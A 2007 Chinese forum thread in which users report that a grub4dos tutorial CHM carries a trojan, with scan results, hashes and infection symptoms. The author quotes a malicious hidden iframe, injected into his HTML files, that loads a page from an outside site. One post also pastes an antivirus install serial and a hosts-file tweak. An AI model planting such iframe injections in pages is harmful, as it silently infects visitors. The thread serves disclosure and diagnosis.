无忧启动论坛

标题: 新版grub4dos初级教程有木马(0826版) [打印本页]

作者: 94wy 时间: 2007-8-27 21:57
标题: 新版grub4dos初级教程有木马(0826版)
http://lianjiang2007.ys168.com/

打开CHM后出现了很多进程,还要求联网,请有能力的大侠鉴定一下!

作者已知道问题,此帖的目的已达到,还是充满希望地等待新版教程!

Antivirus       Version       Last Update       Result
AhnLab-V3       2007.8.28.0       2007.08.27       -
AntiVir       7.4.1.63       2007.08.27       -
Authentium       4.93.8       2007.08.26       -
Avast       4.7.1029.0       2007.08.27       -
AVG       7.5.0.484       2007.08.27       -
BitDefender       7.2       2007.08.27       -
CAT-QuickHeal       9.00       2007.08.25       -
ClamAV       0.91       2007.08.27       -
DrWeb       4.33       2007.08.27       -
eSafe       7.0.15.0       2007.08.26       -
eTrust-Vet       31.1.5088       2007.08.27       -
Ewido       4.0       2007.08.27       -
FileAdvisor       1       2007.08.27       -
Fortinet       2.91.0.0       2007.08.27       -
F-Prot       4.3.2.48       2007.08.26       -
F-Secure       6.70.13030.0       2007.08.27       -
Ikarus       T3.1.1.12       2007.08.27       -
Kaspersky       4.0.2.24       2007.08.27       -
McAfee       5105       2007.08.24       -
Microsoft       1.2803       2007.08.27       -
NOD32v2       2485       2007.08.26       -
Norman       5.80.02       2007.08.27       -
Panda       9.0.0.4       2007.08.27       -
Prevx1       V2       2007.08.27       -
Rising       19.38.02.00       2007.08.27       Trojan.DL.Ieframe.ct
Sophos       4.21.0       2007.08.27       -
Sunbelt       2.2.907.0       2007.08.25       -
Symantec       10       2007.08.27       -
TheHacker       6.1.9.173       2007.08.27       -
VBA32       3.12.2.3       2007.08.27       -
VirusBuster       4.3.26:9       2007.08.27       -
Webwasher-Gateway       6.0.1       2007.08.27       -

Additional information
File size: 992548 bytes
MD5: 8d8cc268dbb34f75711a57ea40903016
SHA1: e05dc5e75cdbf789bf9a351a5a15115ad3d3b7cf
packers: Unicode

18楼的大侠的测试
下载后解压运行，自动下载down.exe文件，接着 Mcafee查出top[1].jpg和hh.exe执行的脚本含有木马，移动top[1].jpg（清除失败）和阻挡脚本后教程出错关闭。不运行自动下载的down.exe文件只会出现上述情况，但是如果运行down.exe，则立即硬盘灯狂闪，且Mcafee实时监控被关闭。至此我未继续测试，在安全盾里面杀掉down.exe进程，并手工开启实时监控，一切恢复正常。

[ 本帖最后由 94wy 于 2007-8-28 09:11 AM 编辑 ]

作者: lianjiang 时间: 2007-8-27 22:05
答复：出现此情况，深感歉意。

可能机子中毒了，已删除网盘中文件，确认后再上传。

请去无忧论坛下载较前版本的教程。
谢谢报告。

“grub4dos初级教程” 作者 lianjiang

作者: lianjiang 时间: 2007-8-27 22:11
原来一直用卡巴斯基5.0，近日所用许可文件提示过期。卸载后又安装了卡巴6.0，可惜所用文件在卡巴升级后提示已被列入黑名单。出现你报告结果不知是否与此有关。

本人无意在文件中添加任何与教程无关内容，也不会。

请已下载者查毒后使用。

特此说明。

作者: lianjiang 时间: 2007-8-27 22:23
补充一点：
装上卡巴6.0后，尽管被列入黑名单，仍然可用，因此暂时就还在用卡巴6.0。
可是经常提示有链接什么“downonlines”之类。结果查了注册表，未找到。

还有就是本来一直可用的到07-09-03的许可文件，08-25那天就提示过期了，换了不少均无效。
后来发现机子日期变成了2001-08-25,手动改成2007后，后来又变成了2001，比较奇怪。
因此就ghost恢复了系统，凑活着在用卡巴6.0。但因仅恢复了系统盘，可能仍不安全。

作者: 94wy 时间: 2007-8-27 22:27
希望lianjiang能再次提供教程:P

作者: lianjiang 时间: 2007-8-27 22:38

原帖由 94wy 于 2007-8-27 10:27 PM 发表
希望lianjiang能再次提供教程:P

刚才恢复系统至刚装机子不久状态，重装了卡巴5.0，升级病毒库后，未出现许可文件过期提示。
扫描了0826版初级教程，未出现异常提示。
我把这个教程以附件发到这里，请有经验者检查验证。确认正常后再上传到网盘。
现正在全盘扫描。
附上几幅截图。
----------------------------
08-28 多人报告发现异常进程，删除附件。

[ 本帖最后由 lianjiang 于 2007-8-28 10:24 AM 编辑 ]

snap070.jpg (70.74 KB, 下载次数: 24)

snap071.jpg (49.06 KB, 下载次数: 24)

作者: lianjiang 时间: 2007-8-27 22:42
因为收集的一些批处理和工具，会被杀软扫描时误杀，以前就碰到过，因此我很少进行扫描全盘了

作者: 94wy 时间: 2007-8-27 22:50
好像是msdebug木马,广告,QQ木马等一下东西

作者: lianjiang 时间: 2007-8-27 22:58
你是用什么杀软？正版还是下载的？
下载的软件的话，我也下来装上看看。

作者: lianjiang 时间: 2007-8-27 22:59
你下载这里的附件看看，杀软有无提示。

作者: 识飞的蛋糕 时间: 2007-8-27 23:17
卡车司机2007-8-27 16:20:02升级的试了没有事

作者: febwind 时间: 2007-8-27 23:31
驱逐舰没查出病毒，楼主如果没好的杀毒软件不妨试试驱逐舰，个人感觉还不错。。。



	产品名称：	驱逐舰单机版
	产品备注：	国际前八强超微专业级杀毒软件
	产品类别：	Virus驱逐舰

产品说明

Virus驱逐舰单机版，全面防御网络病毒及间谍软件
强大的广告/间谍软件扫描功能	完美的病毒扫描与修复功能
集成的广告／间谍软件扫描与清除功能，能强力清除流氓软件、广告软件及间谍软件，最大限度的保护用户的工作免受干扰，保护用户资源不被非法窃取，为用户营造一年安静、安全、安心的上网环境。	引进Dr.Web 4.33最新病毒引擎，多次获得国际权威病毒认证机构VIRUS BULLETIN 100%认证，并获得韩国信息安全协会GOOD SOFTWARE大奖。
简洁灵活的操作界面	智能化每日自动升级
美观的界面，灵活的设置，简洁有力的病毒处理方法，不懂电脑的人也可以轻松驾驭，充分体现了“科技以人为本”的设计理念，驱逐舰将最好的技术、以最好的方式提供给最终用户。	逐舰是实时自动升级功能对病毒进行最迅捷的防范(升级容量为2-6KB，仅为其他同类产品的1/1000)，每天后台自动升级2-12次，其中有效升级平均每天至少２次，升级内容包括病毒库与版本的同步升级。
强有力的双层实时监控功能	对所有商业文件格式的全面查杀
与其他同类产品的单一实时监控不同，驱逐舰具有双层实时监控功能：基于操作系统的常规监控与基于设备驱动级的底层监控。从根本上截断了病毒传染的途径，为用户提供了更强的安全保障。	支持所有的商业文件格式，能完美地清除隐藏在压缩文件，OFFICE文件，电子邮件，文本文件，HTML格式中的病毒
多国语言支持系统	强大的内存修复功能
以默认方法安装时，驱逐舰将自动识别各种语言的操作系统以支持多国语言环境，可以支持简体中文、繁体中文、英文、韩文、日文及泰文。	强大的内存修复能力，检测常驻内存中的病毒代码，彻底清除此代码所寄生在硬盘上的病毒文件，从根源上截断了病毒对系统的二次感染

官方下载地址：http://www.vccn.com.cn/download/vc_pro_license.exe
安装序列号:    8CAFT7TST25ZDCKW563VSUJXX
升级方法：

驱逐舰7月最新反屏蔽轻松升级方法（不反弹）

这2天突然发现，驱逐舰 update1.viruschaser.com.cn 这个升级地址不能升级

不换KEY 把升级服务器改为 update.viruschaser.com.cn 又能升级更新  但每次升级完成后

会自动把升级地址还原为 update1.viruschaser.com.cn  麻烦麻烦！

研究了一下用我下面这个办法能很好的解决以上的问题，反屏蔽  轻松升级不反弹本文作者
霏凡psgl

2007.7.13

本方法就是采用通过 HOSTS 将update1.viruschaser.com.cn  的IP地址指定为update.viruschaser.com.cn 的IP ，达到采用update.viruschaser.com.cn 升级不反弹的目的！

首先  获取update.viruschaser.com.cn 服务器IP地址  开始-运行-CMD  ping update.viruschaser.com.cn

然后将得到的IP地址写入HOSTS 可以进入C:\WINDOWS\system32\drivers\etc\HOTS 去掉只读属性用记事本打开增加211.147.252.220 update1.viruschaser.com.cn 保存之如图

也可以使用软件设置如 System Repair Engineer Hosts MAN

最后设置好后保存这样驱逐舰即可轻松方便升级不反弹
大家试试吧！

[ 本帖最后由 febwind 于 2007-8-27 11:46 PM 编辑 ]

作者: 94wy 时间: 2007-8-27 23:46
Antivirus       Version       Last Update       Result
AhnLab-V3       2007.8.28.0       2007.08.27       -
AntiVir       7.4.1.63       2007.08.27       -
Authentium       4.93.8       2007.08.26       -
Avast       4.7.1029.0       2007.08.27       -
AVG       7.5.0.484       2007.08.27       -
BitDefender       7.2       2007.08.27       -
CAT-QuickHeal       9.00       2007.08.25       -
ClamAV       0.91       2007.08.27       -
DrWeb       4.33       2007.08.27       -
eSafe       7.0.15.0       2007.08.26       -
eTrust-Vet       31.1.5088       2007.08.27       -
Ewido       4.0       2007.08.27       -
FileAdvisor       1       2007.08.27       -
Fortinet       2.91.0.0       2007.08.27       -
F-Prot       4.3.2.48       2007.08.26       -
F-Secure       6.70.13030.0       2007.08.27       -
Ikarus       T3.1.1.12       2007.08.27       -
Kaspersky       4.0.2.24       2007.08.27       -
McAfee       5105       2007.08.24       -
Microsoft       1.2803       2007.08.27       -
NOD32v2       2485       2007.08.26       -
Norman       5.80.02       2007.08.27       -
Panda       9.0.0.4       2007.08.27       -
Prevx1       V2       2007.08.27       -
Rising       19.38.02.00       2007.08.27       Trojan.DL.Ieframe.ct
Sophos       4.21.0       2007.08.27       -
Sunbelt       2.2.907.0       2007.08.25       -
Symantec       10       2007.08.27       -
TheHacker       6.1.9.173       2007.08.27       -
VBA32       3.12.2.3       2007.08.27       -
VirusBuster       4.3.26:9       2007.08.27       -
Webwasher-Gateway       6.0.1       2007.08.27       -

Additional information
File size: 992548 bytes
MD5: 8d8cc268dbb34f75711a57ea40903016
SHA1: e05dc5e75cdbf789bf9a351a5a15115ad3d3b7cf
packers: Unicode

[ 本帖最后由 94wy 于 2007-8-27 11:49 PM 编辑 ]

作者: 94wy 时间: 2007-8-27 23:53
一打开就要联网,怕怕:L

作者: lianjiang 时间: 2007-8-28 07:24
其他的下载了附件的朋友，能否都能来说一下结果？
到底有没问题？

作者: spadek 时间: 2007-8-28 08:10
标题: 回复 #15 lianjiang 的帖子
附件在哪，是那个版本。。。我试试。。。^_^

作者: 不才 时间: 2007-8-28 08:21
嘿嘿，昨晚11时左右，下载解压后运行，刚升级的诺顿立刻报警木马病毒5个，且硬盘狂响，打开进程管理器（Process Explorer），可看到新增5、6个进程，并随即增至10来个进程闪动，红红绿绿煞是好看，cpu占用几近100%。立刻重启电脑，打开进程管理器后看到新增一个进程，具体名字忘了。
后悔事前未冰封系统，只好动用ghost了。

作者: xubo1971 时间: 2007-8-28 08:56
下载后解压运行，自动下载down.exe文件，接着Mcafee查出top[1].jpg和hh.exe执行的脚本含有木马，移动top[1].jpg（清除失败）和阻挡脚本后教程出错关闭。不运行自动下载的down.exe文件只会出现上述情况，但是如果运行down.exe，则立即硬盘灯狂闪，且Mcafee实时监控被关闭。至此我未继续测试，在安全盾里面杀掉down.exe进程，并手工开启实时监控，一切恢复正常。

作者: xubo1971 时间: 2007-8-28 09:01
最近上网，很多网页只要一点击就会自动下载一些exe文件，就象自动下载down.exe文件一样，我通常都是取消了下载。这么多网页都挂马？

作者: 94wy 时间: 2007-8-28 09:07

原帖由不才于 2007-8-28 08:21 AM 发表
嘿嘿，昨晚11时左右，下载解压后运行，刚升级的诺顿立刻报警木马病毒5个，且硬盘狂响，打开进程管理器（Process Explorer），可看到新增5、6个进程，并随即增至10来个进程闪动，红红绿绿煞是好看，cpu占用几近1 ...

情况类似,我也准备ghost系统:L

作者: zhyao2001 时间: 2007-8-28 09:29
应该是有病毒我的卡巴6.0报警
好像的机器中了类似arp欺骗的病毒

图片是报警情况始终要求链接一个图片这个图片可能就是木马我是拒绝链接。

ccc.gif (25.85 KB, 下载次数: 17)

作者: lianjiang 时间: 2007-8-28 09:48
今天又在另一机子用“趋势防病毒”查了一遍，仍无异常提示。
以前一直用诺顿，后来看到介绍说卡巴杀毒能力强，5.0版占用内存又少，因此从此改用巴卡。
没想到现在出了这事，甚是困惑。

刚才突然想到，打开原始的htm文件看看。一看发现文件中多了一行“<iframe src=http://www.mydirvers.net/page/image/pd.htm height=0></iframe>”
再一看。文件时间变成了“2001-08-25”，越看越气愤，盘里保存的其它htm格式资料也基本上都变成了“2001-08-25”，里面都有上面的那一行。看来真是中毒了。
呜呼哀哉。
清除它们够我弄半天的了。
感谢楼主的提醒。

snap072.jpg (52.26 KB, 下载次数: 18)

snap073.jpg (39.39 KB, 下载次数: 21)

snap074.jpg (128.15 KB, 下载次数: 18)

snap075.jpg (64.43 KB, 下载次数: 15)

作者: lianjiang 时间: 2007-8-28 09:52

原帖由 zhyao2001 于 2007-8-28 09:29 AM 发表
应该是有病毒我的卡巴6.0报警
好像的机器中了类似arp欺骗的病毒

图片是报警情况始终要求链接一个图片这个图片可能就是木马我是拒绝链接。

onlinedows这个链接的警告在我用卡巴6.0时也是经常蹦出来。

作者: lianjiang 时间: 2007-8-28 10:25
重新制作了“grub4dos初级教程_0828”，请测试。

欢迎光临无忧启动论坛 (http://bbs.wuyou.net/)